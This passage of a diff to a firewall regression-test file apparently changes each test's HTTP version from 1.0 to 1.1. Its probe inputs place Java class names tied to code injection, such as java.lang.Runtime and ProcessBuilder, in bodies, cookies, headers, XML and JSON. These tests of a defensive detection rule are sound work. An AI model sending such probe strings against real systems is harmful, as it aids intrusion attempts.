           data: "{\"java.io.PipedReader\": \"test\"}"
         output:
           log:
@@ -4478,7 +4478,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.PrintStream"
         output:
           log:
@@ -4498,7 +4498,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.PrintStream=test"
         output:
           log:
@@ -4519,7 +4519,7 @@ tests:
             Cookie: test=java.io.PrintStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4540,7 +4540,7 @@ tests:
             Cookie: java.io.PrintStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4561,7 +4561,7 @@ tests:
             test: java.io.PrintStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4581,7 +4581,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.PrintStream\">element_value</element></xml>"
         output:
           log:
@@ -4601,7 +4601,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.PrintStream</element></xml>"
         output:
           log:
@@ -4621,7 +4621,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.PrintStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -4641,7 +4641,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.PrintStream"
         output:
           log:
@@ -4661,7 +4661,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.PrintStream\"}"
         output:
           log:
@@ -4681,7 +4681,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.PrintStream\": \"test\"}"
         output:
           log:
@@ -4701,7 +4701,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.PushbackInputStream"
         output:
           log:
@@ -4721,7 +4721,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.PushbackInputStream=test"
         output:
           log:
@@ -4742,7 +4742,7 @@ tests:
             Cookie: test=java.io.PushbackInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4763,7 +4763,7 @@ tests:
             Cookie: java.io.PushbackInputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4784,7 +4784,7 @@ tests:
             test: java.io.PushbackInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4804,7 +4804,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.PushbackInputStream\">element_value</element></xml>"
         output:
           log:
@@ -4824,7 +4824,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.PushbackInputStream</element></xml>"
         output:
           log:
@@ -4844,7 +4844,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.PushbackInputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -4864,7 +4864,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.PushbackInputStream"
         output:
           log:
@@ -4884,7 +4884,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.PushbackInputStream\"}"
         output:
           log:
@@ -4904,7 +4904,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.PushbackInputStream\": \"test\"}"
         output:
           log:
@@ -4924,7 +4924,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.Reader"
         output:
           log:
@@ -4944,7 +4944,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.Reader=test"
         output:
           log:
@@ -4965,7 +4965,7 @@ tests:
             Cookie: test=java.io.Reader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4986,7 +4986,7 @@ tests:
             Cookie: java.io.Reader=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5007,7 +5007,7 @@ tests:
             test: java.io.Reader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5027,7 +5027,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.Reader\">element_value</element></xml>"
         output:
           log:
@@ -5047,7 +5047,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.Reader</element></xml>"
         output:
           log:
@@ -5067,7 +5067,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.Reader</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5087,7 +5087,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.Reader"
         output:
           log:
@@ -5107,7 +5107,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.Reader\"}"
         output:
           log:
@@ -5127,7 +5127,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.Reader\": \"test\"}"
         output:
           log:
@@ -5147,7 +5147,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.StringReader"
         output:
           log:
@@ -5167,7 +5167,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.StringReader=test"
         output:
           log:
@@ -5188,7 +5188,7 @@ tests:
             Cookie: test=java.io.StringReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5209,7 +5209,7 @@ tests:
             Cookie: java.io.StringReader=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5230,7 +5230,7 @@ tests:
             test: java.io.StringReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5250,7 +5250,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.StringReader\">element_value</element></xml>"
         output:
           log:
@@ -5270,7 +5270,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.StringReader</element></xml>"
         output:
           log:
@@ -5290,7 +5290,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.StringReader</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5310,7 +5310,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.StringReader"
         output:
           log:
@@ -5330,7 +5330,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.StringReader\"}"
         output:
           log:
@@ -5350,7 +5350,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.StringReader\": \"test\"}"
         output:
           log:
@@ -5370,7 +5370,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Class"
         output:
           log:
@@ -5390,7 +5390,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.Class=test"
         output:
           log:
@@ -5411,7 +5411,7 @@ tests:
             Cookie: test=java.lang.Class
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5432,7 +5432,7 @@ tests:
             Cookie: java.lang.Class=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5453,7 +5453,7 @@ tests:
             test: java.lang.Class
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5473,7 +5473,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.Class\">element_value</element></xml>"
         output:
           log:
@@ -5493,7 +5493,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Class</element></xml>"
         output:
           log:
@@ -5513,7 +5513,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.Class</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5533,7 +5533,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Class"
         output:
           log:
@@ -5553,7 +5553,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.Class\"}"
         output:
           log:
@@ -5573,7 +5573,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.Class\": \"test\"}"
         output:
           log:
@@ -5593,7 +5593,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Integer"
         output:
           log:
@@ -5613,7 +5613,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.Integer=test"
         output:
           log:
@@ -5634,7 +5634,7 @@ tests:
             Cookie: test=java.lang.Integer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5655,7 +5655,7 @@ tests:
             Cookie: java.lang.Integer=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5676,7 +5676,7 @@ tests:
             test: java.lang.Integer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5696,7 +5696,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.Integer\">element_value</element></xml>"
         output:
           log:
@@ -5716,7 +5716,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Integer</element></xml>"
         output:
           log:
@@ -5736,7 +5736,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.Integer</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5756,7 +5756,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Integer"
         output:
           log:
@@ -5776,7 +5776,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.Integer\"}"
         output:
           log:
@@ -5796,7 +5796,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.Integer\": \"test\"}"
         output:
           log:
@@ -5816,7 +5816,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Number"
         output:
           log:
@@ -5836,7 +5836,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.Number=test"
         output:
           log:
@@ -5857,7 +5857,7 @@ tests:
             Cookie: test=java.lang.Number
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5878,7 +5878,7 @@ tests:
             Cookie: java.lang.Number=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5899,7 +5899,7 @@ tests:
             test: java.lang.Number
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -5919,7 +5919,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.Number\">element_value</element></xml>"
         output:
           log:
@@ -5939,7 +5939,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Number</element></xml>"
         output:
           log:
@@ -5959,7 +5959,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.Number</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5979,7 +5979,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Number"
         output:
           log:
@@ -5999,7 +5999,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.Number\"}"
         output:
           log:
@@ -6019,7 +6019,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.Number\": \"test\"}"
         output:
           log:
@@ -6039,7 +6039,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Object"
         output:
           log:
@@ -6059,7 +6059,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.Object=test"
         output:
           log:
@@ -6080,7 +6080,7 @@ tests:
             Cookie: test=java.lang.Object
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6101,7 +6101,7 @@ tests:
             Cookie: java.lang.Object=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6122,7 +6122,7 @@ tests:
             test: java.lang.Object
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6142,7 +6142,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.Object\">element_value</element></xml>"
         output:
           log:
@@ -6162,7 +6162,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Object</element></xml>"
         output:
           log:
@@ -6182,7 +6182,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.Object</element></l3></l2></l1></xml>"
         output:
           log:
@@ -6202,7 +6202,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Object"
         output:
           log:
@@ -6222,7 +6222,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.Object\"}"
         output:
           log:
@@ -6242,7 +6242,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.Object\": \"test\"}"
         output:
           log:
@@ -6262,7 +6262,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Process"
         output:
           log:
@@ -6282,7 +6282,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.Process=test"
         output:
           log:
@@ -6303,7 +6303,7 @@ tests:
             Cookie: test=java.lang.Process
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6324,7 +6324,7 @@ tests:
             Cookie: java.lang.Process=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6345,7 +6345,7 @@ tests:
             test: java.lang.Process
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6365,7 +6365,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.Process\">element_value</element></xml>"
         output:
           log:
@@ -6385,7 +6385,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Process</element></xml>"
         output:
           log:
@@ -6405,7 +6405,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.Process</element></l3></l2></l1></xml>"
         output:
           log:
@@ -6425,7 +6425,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Process"
         output:
           log:
@@ -6445,7 +6445,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.Process\"}"
         output:
           log:
@@ -6465,7 +6465,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.Process\": \"test\"}"
         output:
           log:
@@ -6485,7 +6485,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.ProcessBuilder"
         output:
           log:
@@ -6505,7 +6505,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.ProcessBuilder=test"
         output:
           log:
@@ -6526,7 +6526,7 @@ tests:
             Cookie: test=java.lang.ProcessBuilder
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6547,7 +6547,7 @@ tests:
             Cookie: java.lang.ProcessBuilder=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6568,7 +6568,7 @@ tests:
             test: java.lang.ProcessBuilder
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6588,7 +6588,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.ProcessBuilder\">element_value</element></xml>"
         output:
           log:
@@ -6608,7 +6608,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.ProcessBuilder</element></xml>"
         output:
           log:
@@ -6628,7 +6628,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.ProcessBuilder</element></l3></l2></l1></xml>"
         output:
           log:
@@ -6648,7 +6648,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.ProcessBuilder"
         output:
           log:
@@ -6668,7 +6668,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.ProcessBuilder\"}"
         output:
           log:
@@ -6688,7 +6688,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.ProcessBuilder\": \"test\"}"
         output:
           log:
@@ -6708,7 +6708,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.reflect"
         output:
           log:
@@ -6728,7 +6728,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.reflect=test"
         output:
           log:
@@ -6749,7 +6749,7 @@ tests:
             Cookie: test=java.lang.reflect
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6770,7 +6770,7 @@ tests:
             Cookie: java.lang.reflect=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6791,7 +6791,7 @@ tests:
             test: java.lang.reflect
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -6811,7 +6811,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.reflect\">element_value</element></xml>"
         output:
           log:
@@ -6831,7 +6831,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.reflect</element></xml>"
         output:
           log:
@@ -6851,7 +6851,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.reflect</element></l3></l2></l1></xml>"
         output:
           log:
@@ -6871,7 +6871,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.reflect"
         output:
           log:
@@ -6891,7 +6891,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.reflect\"}"
         output:
           log:
@@ -6911,7 +6911,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.reflect\": \"test\"}"
         output:
           log:
@@ -6931,7 +6931,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Runtime"
         output:
           log:
@@ -6951,7 +6951,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.Runtime=test"
         output:
           log:
@@ -6972,7 +6972,7 @@ tests:
             Cookie: test=java.lang.Runtime
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
